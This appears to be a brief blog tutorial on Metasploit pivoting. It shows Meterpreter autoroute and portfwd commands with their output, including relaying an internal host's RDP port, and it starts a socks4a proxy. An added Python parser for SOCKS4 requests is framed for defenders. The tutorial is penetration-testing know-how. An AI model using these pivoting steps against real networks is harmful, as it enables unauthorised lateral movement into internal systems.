Metasploit - route and port forwarding

Routing

Adding a route automatically

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. 

[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Local subnet: 172.17.0.0/255.255.0.0

From this output, the target's internal network segment is "172.17.0.0/24".

Add a forwarding route to the target network segment:

meterpreter > run autoroute -s 172.17.0.0/24

Once the route has been added successfully, check the routes that are in place:

meterpreter > run autoroute -p

Adding a route manually

route add 192.168.206.200  255.255.255.0  1
route print

Port forwarding

meterpreter > portfwd 
0 total local port forwards.
meterpreter > portfwd  -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

To forward port 3389 on 10.1.1.129 to local port 2222 and listen on it, use the following:

meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
meterpreter > portfwd 
0: 0.0.0.0:2222 -> 10.1.1.129:3389
1 total local port forwards.

Setting up a proxy

Use socks4a and configure it to listen on a port:

msf exploit(handler) > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > show options 
Module options (auxiliary/server/socks4a):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.
Auxiliary action:
   Name   Description
   ----   -----------
   Proxy  
msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) > 
[*] Starting the socks4a proxy server
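
The listener started above speaks SOCKS4a. As an added example (not from the original post and not Metasploit's own code), this Python parser decodes the first client message on such a listener, which is the structure a defender would match on when inspecting traffic to port 1080. The sample bytes and the hostname intranet.example are constructed for illustration.

```python
import ipaddress
import struct

class Socks4Error(ValueError):
    """Raised when the bytes are not a complete, valid SOCKS4/4a request."""

def _cstring(buf, start):
    """Return (text, next_offset) for the NUL-terminated field at `start`."""
    end = buf.find(b"\x00", start)
    if end < 0:
        raise Socks4Error("missing NUL terminator (truncated request)")
    return buf[start:end].decode("latin-1"), end + 1

def parse_socks4_request(buf):
    """Parse the first client message seen on a SOCKS4/4a listener."""
    if len(buf) < 8:
        raise Socks4Error("shorter than the 8-byte fixed header")
    version, command, port, raw_ip = struct.unpack("!BBH4s", buf[:8])
    if version != 4:
        raise Socks4Error("not SOCKS version 4")
    if command not in (1, 2):
        raise Socks4Error("unknown command code")
    user_id, offset = _cstring(buf, 8)
    # SOCKS4a marker: destination IP 0.0.0.x with x != 0 means the proxy
    # resolves the hostname that follows the user id.
    is_4a = raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0
    if is_4a:
        host, offset = _cstring(buf, offset)
    else:
        host = str(ipaddress.IPv4Address(raw_ip))
    return {
        "variant": "socks4a" if is_4a else "socks4",
        "command": "connect" if command == 1 else "bind",
        "dest_host": host,
        "dest_port": port,
        "user_id": user_id,
        "header_len": offset,
    }

# Constructed sample requests (not captured traffic).
SAMPLE_4A = b"\x04\x01\x0d\x3d\x00\x00\x00\x01\x00intranet.example\x00"
SAMPLE_4 = b"\x04\x01\x0d\x3d\x0a\x01\x01\x81\x00"

if __name__ == "__main__":
    for sample in (SAMPLE_4A, SAMPLE_4, b"\x05\x01\x00"):
        try:
            print(parse_socks4_request(sample))
        except Socks4Error as exc:
            print("rejected:", exc)
```
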
posted @ 2020-05-08 14:10  mrhonest